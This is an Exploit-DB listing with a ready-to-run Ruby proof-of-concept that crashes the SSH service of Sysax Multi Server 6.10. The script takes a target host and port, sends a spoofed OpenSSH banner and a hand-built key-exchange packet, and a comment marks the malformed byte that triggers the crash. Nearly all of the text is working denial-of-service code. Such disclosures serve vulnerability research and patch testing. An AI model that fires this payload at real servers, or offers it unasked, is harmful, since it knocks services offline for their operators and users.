Sysax Multi Server 6.10 - SSH Denial of Service



EDB-ID: 24940 CVE: N/A OSVDB-ID: 92081
Author: Matt Andreko Published: 2013-04-09 Verified: Verified
Exploit Code:   Download Vulnerable App:    Download

Rating

(0.0)
Prev Home Next
#!/usr/bin/env ruby
# Sysax Multi Server 6.10 SSH DoS
# Matt "hostess" Andreko < mandreko [at] accuvant.com >
# http://www.mattandreko.com/2013/04/sysax-multi-server-610-ssh-dos.html

require 'socket'

unless ARGV.length == 2
  puts "Usage: ruby #{$0} [host] [port]\n"
  exit
end

packet = [0x00, 0x00, 0x03, 0x14, 0x08, 0x14, 0xff, 0x9f,
  0xde, 0x5d, 0x5f, 0xb3, 0x07, 0x8f, 0x49, 0xa7,
  0x79, 0x6a, 0x03, 0x3d, 0xaf, 0x55, 0x00, 0x00,
  0x00, 0x7e, 0x64, 0x69, 0x66, 0x66, 0x69, 0x65,
  0x2d, 0x68, 0x65, 0x6c, 0x6c, 0x6d, 0x61, 0x6e,
  0x2d, 0x67, 0x72, 0x6f, 0x75, 0x70, 0x2d, 0x65,
  0x78, 0x63, 0x68, 0x61, 0x6e, 0x67, 0x65, 0x2d,
  0x73, 0x68, 0x61, 0x32, 0x35, 0x36, 0x2c, 0x64,
  0x69, 0x66, 0x66, 0x69, 0x65, 0x2d, 0x68, 0x65,
  0x6c, 0x6c, 0x6d, 0x61, 0x6e, 0x2d, 0x67, 0x72,
  0x6f, 0x75, 0x70, 0x2d, 0x65, 0x78, 0x63, 0x68,
  0x61, 0x6e, 0x67, 0x65, 0x2d, 0x73, 0x68, 0x61,
  0x31, 0x2c, 0x64, 0x69, 0x66, 0x66, 0x69, 0x65,
  0x2d, 0x68, 0x65, 0x6c, 0x6c, 0x6d, 0x61, 0x6e,
  0x2d, 0x67, 0x72, 0x6f, 0x75, 0x70, 0x31, 0x34,
  0x2d, 0x73, 0x68, 0x61, 0x31, 0x2c, 0x64, 0x69,
  0x66, 0x66, 0x69, 0x65, 0x2d, 0x68, 0x65, 0x6c,
  0x6c, 0x6d, 0x61, 0x6e, 0x2d, 0x67, 0x72, 0x6f,
  0x75, 0x70, 0x31, 0x2d, 0x73, 0x68, 0x61, 0x31,
  0x00, 0x00, 0x00, 0x0f, 0x73, 0x73, 0x68, 0x2d,
  0x72, 0x73, 0x61, 0x2c, 0x73, 0x73, 0x68, 0x2d,
  0x64, 0x73, 0x73, 0x00, 0x00, 0x00, 0x9d, 0x61,
  0x65, 0x73, 0x31, 0x32, 0x38, 0x2d, 0x63, 0x62,
  0x63, 0x2c, 0x33, 0x64, 0x65, 0x73, 0x2d, 0x63,
  0x62, 0x63, 0x2c, 0x62, 0x6c, 0x6f, 0x77, 0x66,
  0x69, 0x73, 0x68, 0x2d, 0x63, 0x62, 0x63, 0x2c,
  0x63, 0x61, 0x73, 0x74, 0x31, 0x32, 0x38, 0x2d,
  0x63, 0x62, 0x63, 0x2c, 0x61, 0x72, 0x63, 0x66,
  0x6f, 0x75, 0x72, 0x31, 0x32, 0x38, 0x2c, 0x61,
  0x72, 0x63, 0x66, 0x6f, 0x75, 0x72, 0x32, 0x35,
  0x36, 0x2c, 0x61, 0x72, 0x63, 0x66, 0x6f, 0x75,
  0x72, 0x2c, 0x61, 0x65, 0x73, 0x31, 0x39, 0x32,
  0x2d, 0x63, 0x62, 0x63, 0x2c, 0x61, 0x65, 0x73,
  0x32, 0x35, 0x36, 0x2d, 0x63, 0x62, 0x63, 0x2c,
  0x72, 0x69, 0x6a, 0x6e, 0x64, 0x61, 0x65, 0x6c,
  0x2d, 0x63, 0x62, 0x63, 0x40, 0x6c, 0x79, 0x73,
  0x61, 0x74, 0x6f, 0x72, 0x2e, 0x6c, 0x69, 0x75,
  0x2e, 0x73, 0x65, 0x2c, 0x61, 0x65, 0x73, 0x31,
  0x32, 0x38, 0x2d, 0x63, 0x74, 0x72, 0x2c, 0x61,
  0x65, 0x73, 0x31, 0x39, 0x32, 0x2d, 0x63, 0x74,
  0x72, 0x2c, 0x61, 0x65, 0x73, 0x32, 0x35, 0x36,
  0x2d, 0x63, 0x74, 0x72, 0x00, 0x00, 0x00, 0x9d,
  0x61, 0x65, 0x73, 0x31, 0x32, 0x38, 0x2d, 0x63,
  0x62, 0x63, 0x2c, 0x33, 0x64, 0x65, 0x73, 0x2d,
  0x63, 0x62, 0x63, 0x2c, 0x62, 0x6c, 0x6f, 0x77,
  0x66, 0x69, 0x73, 0x68, 0x2d, 0x63, 0x62, 0x63,
  0x2c, 0x63, 0x61, 0x73, 0x74, 0x31, 0x32, 0x38,
  0x2d, 0x63, 0x62, 0x63, 0x2c, 0x61, 0x72, 0x63,
  0x66, 0x6f, 0x75, 0x72, 0x31, 0x32, 0x38, 0x2c,
  0x61, 0x72, 0x63, 0x66, 0x6f, 0x75, 0x72, 0x32,
  0x35, 0x36, 0x2c, 0x61, 0x72, 0x63, 0x66, 0x6f,
  0x75, 0x72, 0x2c, 0x61, 0x65, 0x73, 0x31, 0x39,
  0x32, 0x2d, 0x63, 0x62, 0x63, 0x2c, 0x61, 0x65,
  0x73, 0x32, 0x35, 0x36, 0x2d, 0x63, 0x62, 0x63,
  0x2c, 0x72, 0x69, 0x6a, 0x6e, 0x64, 0x61, 0x65,
  0x6c, 0x2d, 0x63, 0x62, 0x63, 0x40, 0x6c, 0x79,
  0x73, 0x61, 0x74, 0x6f, 0x72, 0x2e, 0x6c, 0x69,
  0x75, 0x2e, 0x73, 0x65, 0x2c, 0x61, 0x65, 0x73,
  0x31, 0x32, 0x38, 0x2d, 0x63, 0x74, 0x72, 0x2c,
  0x61, 0x65, 0x73, 0x31, 0x39, 0x32, 0x2d, 0x63,
  0x74, 0x72, 0x2c, 0x61, 0x65, 0x73, 0x32, 0x35,
  0x36, 0x2d, 0x63, 0x74, 0x72, 0x00, 0x00, 0x00,
  0x69, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x6d, 0x64,
  0x35, 0x2c, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x73,
  0x68, 0x61, 0x31, 0x2c, 0x75, 0x6d, 0x61, 0x63,
  0x2d, 0x36, 0x34, 0x40, 0x6f, 0x70, 0x65, 0x6e,
  0x73, 0x73, 0x68, 0x2e, 0x63, 0x6f, 0x6d, 0x2c,
  0x68, 0x6d, 0x61, 0x63, 0x2d, 0x72, 0x69, 0x70,
  0x65, 0x6d, 0x64, 0x31, 0x36, 0x30, 0x2c, 0x68,
  0x6d, 0x61, 0x63, 0x2d, 0x72, 0x69, 0x70, 0x65,
  0x6d, 0x64, 0x31, 0x36, 0x30, 0x40, 0x6f, 0x70,
  0x65, 0x6e, 0x73, 0x73, 0x68, 0x2e, 0x63, 0x6f,
  0x6d, 0x2c, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x73,
  0x68, 0x61, 0x31, 0x2d, 0x39, 0x36, 0x2c, 0x68,
  0x6d, 0x61, 0x63, 0x2d, 0x6d, 0x64, 0x35, 0x2d,
  0x39, 0x36, 0x00, 0x00, 0x00, 0x69, 0x68, 0x6d,
  0x61, 0x63, 0x2d, 0x6d, 0x64, 0x35, 0x2c, 0x68,
  0x6d, 0x61, 0x63, 0x2d, 0x73, 0x68, 0x61, 0x31,
  0x2c, 0x75, 0x6d, 0x61, 0x63, 0x2d, 0x36, 0x34,
  0x40, 0x6f, 0x70, 0x65, 0x6e, 0x73, 0x73, 0x68,
  0x2e, 0x63, 0x6f, 0x6d, 0x2c, 0x68, 0x6d, 0x61,
  0x63, 0x2d, 0x72, 0x69, 0x70, 0x65, 0x6d, 0x64,
  0x31, 0x36, 0x30, 0x2c, 0x68, 0x6d, 0x61, 0x63,
  0x2d, 0x72, 0x69, 0x70, 0x65, 0x6d, 0x64, 0x31,
  0x36, 0x30, 0x40, 0x6f, 0x70, 0x65, 0x6e, 0x73,
  0x73, 0x68, 0x2e, 0x63, 0x6f, 0x6d, 0x2c, 0x68,
  0x6d, 0x61, 0x63, 0x2d, 0x73, 0x68, 0x61, 0x31,
  0x2d, 0x39, 0x36, 0x2c, 0x68, 0x6d, 0x61, 0x63,
  0x2d, 0x6d, 0x64, 0x35, 0x2d, 0x39, 0x36, 0x00,
  #3rd byte in this next line causes crash
  0x00, 0x00, 0x28, 0x7a, 0x6c, 0x69, 0x62, 0x40,
  0x6f, 0x70, 0x65, 0x6e, 0x73, 0x73, 0x68, 0x2e,
  0x63, 0x6f, 0x6d, 0x2c, 0x7a, 0x6c, 0x69, 0x62,
  0x2c, 0x6e, 0x6f, 0x6e, 0x65, 0x00, 0x00, 0x00,
  0x1a, 0x7a, 0x6c, 0x69, 0x62, 0x40, 0x6f, 0x70,
  0x65, 0x6e, 0x73, 0x73, 0x68, 0x2e, 0x63, 0x6f,
  0x6d, 0x2c, 0x7a, 0x6c, 0x69, 0x62, 0x2c, 0x6e,
  0x6f, 0x6e, 0x65, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00].pack("C*")

host = ARGV[0]
port = ARGV[1]

sock = TCPSocket.open(host, port)

banner = sock.gets()
puts banner

sock.puts("SSH-2.0-OpenSSH_5.1p1 Debian-5ubuntu1\r\n")
sock.puts(packet)
resp = sock.gets()

sock.close()